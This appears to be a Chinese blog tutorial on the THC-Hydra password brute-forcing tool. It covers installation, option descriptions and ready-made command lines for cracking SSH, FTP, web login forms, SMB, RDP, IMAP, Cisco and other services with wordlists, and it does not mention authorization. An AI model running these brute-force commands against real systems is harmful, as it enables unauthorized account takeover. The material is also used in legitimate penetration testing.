Hydra使用说明——爆破神器

一、简介 hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。 官 网:http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。

二、安装 Hydra 安装

wget --no-check-certificate https://www.thc.org/releases/hydra-8.1.tar.gz

tar zxvf hydra-8.1.tar.gz

cd hydra-8.1

./configure

make && make install

三、参数说明

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]

[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]

-R 继续从上一次进度接着破解。

-S 采用SSL链接。

-s PORT 可通过这个参数指定非默认端口。

-l LOGIN 指定破解的用户,对特定用户破解。

-L FILE 指定用户名字典。

-p PASS 小写,指定密码破解,少用,一般是采用密码字典。

-P FILE 大写,指定密码字典。

-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。

-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。

-M FILE 指定目标列表文件一行一条。

-o FILE 指定结果输出文件。

-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。

-t TASKS 同时运行的线程数,默认为16。

-w TIME 设置最大超时的时间,单位秒,默认是30s。

-v / -V 显示详细过程。

server 目标ip

service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。

OPT 可选项

四、各种用法实例 :

1、破解ssh: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp: hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交,破解web登录: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

4、post方式提交,破解web登录: hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:wrong username or password" (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中 的内容是表示错误猜解的返回信息提示。)</p> <p>5、破解https: hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https</p> <p>6、破解teamspeak: hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak</p> <p>7、破解cisco: hydra -P pass.txt 10.36.16.18 cisco hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable</p> <p>8、破解smb: hydra -l administrator -P pass.txt 10.36.16.18 smb</p> <p>9、破解pop3: hydra -l muts -P pass.txt my.pop3.mail pop3</p> <p>10、破解rdp: hydra ip rdp -l administrator -P pass.txt -V</p> <p>11、破解http-proxy: hydra -l admin -P pass.txt http-proxy://10.36.16.18</p> <p>12、破解imap: hydra -L user.txt -p secret 10.36.16.18 imap PLAIN hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN</p> </div> </article> <html lang="en"> <body> <div> <div id="8" class="comment-container"> <div id="comments" class="clearfix"> <div> <span class="response">评论已关闭.</span> </div> </div> </div> </div> </body> <html lang="en"> <body> <script type="text/javascript"> /*<![CDATA[*/ (function () { window.TaleComment = { dom: function (id) { return document.getElementById(id); }, create: function (tag, attr) { var el = document.createElement(tag); for (var key in attr) { el.setAttribute(key, attr[key]); } return el; }, reply: function (coid) { $('#comment-form input[name=coid]').val(coid); $("html,body").animate({scrollTop: $('div.comment-container').offset().top}, 500); $('#comment-form #textarea').focus(); }, subComment: function () { $.ajax({ type: 'post', url: '/comment', data: $('#comment-form').serialize(), async: false, dataType: 'json', success: function (result) { $('#comment-form input[name=coid]').val(''); if (result && result.success) { alert("评论已提交至后台审核!"); window.location.reload(); } else { if (result.msg) { alert(result.msg); } } } }); return false; } }; })(); function getCommentCookie(name) { var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)"); if (arr = document.cookie.match(reg)) return unescape(decodeURI(arr[2])); else return null; } function addCommentInputValue() { document.getElementById('author').value = getCommentCookie('tale_remember_author'); document.getElementById('mail').value = getCommentCookie('tale_remember_mail'); document.getElementById('url').value = getCommentCookie('tale_remember_url'); } addCommentInputValue(); /*]]>*/ </script> </body> </html> </html> <html lang="en"> <body> <footer class="footer bg-white"> <div class="footer-social"> <div class="footer-container clearfix"> <div class="social-list"> © <span>2023</span> Yourheart <a href="https://beian.miit.gov.cn/" target="_blank"> 鄂ICP备19016375号-<span>2</span> </a> </div> </div> </div> <div class="footer-meta"> <div class="footer-container"> <div class="meta-item meta-copyright"> <div class="meta-copyright-info"> </div> </div> </div> </div> </footer> <div id="directory-content" class="directory-content"> <div id="directory"> </div> </div> <script> /*<![CDATA[*/ var postDirectoryBuild = function () { var postChildren = function children(childNodes, reg) { var result = [], isReg = typeof reg === 'object', isStr = typeof reg === 'string', node, i, len; for (i = 0, len = childNodes.length; i < len; i++) { node = childNodes[i]; if ((node.nodeType === 1 || node.nodeType === 9) && (!reg || isReg && reg.test(node.tagName.toLowerCase()) || isStr && node.tagName.toLowerCase() === reg)) { result.push(node); } } return result; }, createPostDirectory = function (article, directory, isDirNum) { var contentArr = [], titleId = [], levelArr, root, level, currentList, list, li, link, i, len; levelArr = (function (article, contentArr, titleId) { var titleElem = postChildren(article.childNodes, /^h\d$/), levelArr = [], lastNum = 1, lastRevNum = 1, count = 0, guid = 1, id = 'directory' + (Math.random() + '').replace(/\D/, ''), lastRevNum, num, elem; while (titleElem.length) { elem = titleElem.shift(); contentArr.push(elem.innerHTML); num = +elem.tagName.match(/\d/)[0]; if (num > lastNum) { levelArr.push(1); lastRevNum += 1; } else if (num === lastRevNum || num > lastRevNum && num <= lastNum) { levelArr.push(0); lastRevNum = lastRevNum; } else if (num < lastRevNum) { levelArr.push(num - lastRevNum); lastRevNum = num; } count += levelArr[levelArr.length - 1]; lastNum = num; elem.id = elem.id || (id + guid++); titleId.push(elem.id); } if (count !== 0 && levelArr[0] === 1) levelArr[0] = 0; return levelArr; })(article, contentArr, titleId); currentList = root = document.createElement('ul'); dirNum = [0]; for (i = 0, len = levelArr.length; i < len; i++) { level = levelArr[i]; if (level === 1) { list = document.createElement('ul'); if (!currentList.lastElementChild) { currentList.appendChild(document.createElement('li')); } currentList.lastElementChild.appendChild(list); currentList = list; dirNum.push(0); } else if (level < 0) { level *= 2; while (level++) { if (level % 2) dirNum.pop(); currentList = currentList.parentNode; } } dirNum[dirNum.length - 1]++; li = document.createElement('li'); link = document.createElement('a'); link.href = '#' + titleId[i]; link.innerHTML = !isDirNum ? contentArr[i] : dirNum.join('.') + ' ' + contentArr[i]; li.appendChild(link); currentList.appendChild(li); } directory.appendChild(root); }; createPostDirectory(document.getElementById('post-content'), document.getElementById('directory'), true); }; postDirectoryBuild(); /*]]>*/ </script> <script src="//cdn.bootcss.com/headroom/0.9.1/headroom.min.js"></script> <script src="//cdn.bootcss.com/highlight.js/9.9.0/highlight.min.js"></script> <script src="//cdn.bootcss.com/instantclick/3.0.1/instantclick.min.js"></script> <script> /*<![CDATA[*/ var isOk = true; if (isOk) { var postDirectory = new Headroom(document.getElementById("directory-content"), { tolerance: 0, offset: 100, classes: { initial: "initial", pinned: "pinned", unpinned: "unpinned" } }); } var header = new Headroom(document.getElementById("header"), { tolerance: 10, offset: 80, classes: { initial: "animated", pinned: "slideDown", unpinned: "slideUp" } }); header.init(); $('#search-inp').keypress(function (e) { var key = e.which; //e.which是按键的值 if (key == 13) { var q = $(this).val(); if (q && q != '') { window.location.href = '/search/' + q; } } }); /*]]>*/ </script> <script data-no-instant=""> /*<![CDATA[*/ InstantClick.on('change', function (isInitialLoad) { var blocks = document.querySelectorAll('pre code'); for (var i = 0; i < blocks.length; i++) { hljs.highlightBlock(blocks[i]); } if (isInitialLoad === false) { if (typeof ga !== 'undefined') ga('send', 'pageview', location.pathname + location.search); } }); InstantClick.init('mousedown'); /*]]>*/ </script> </body> </html> </body> </html>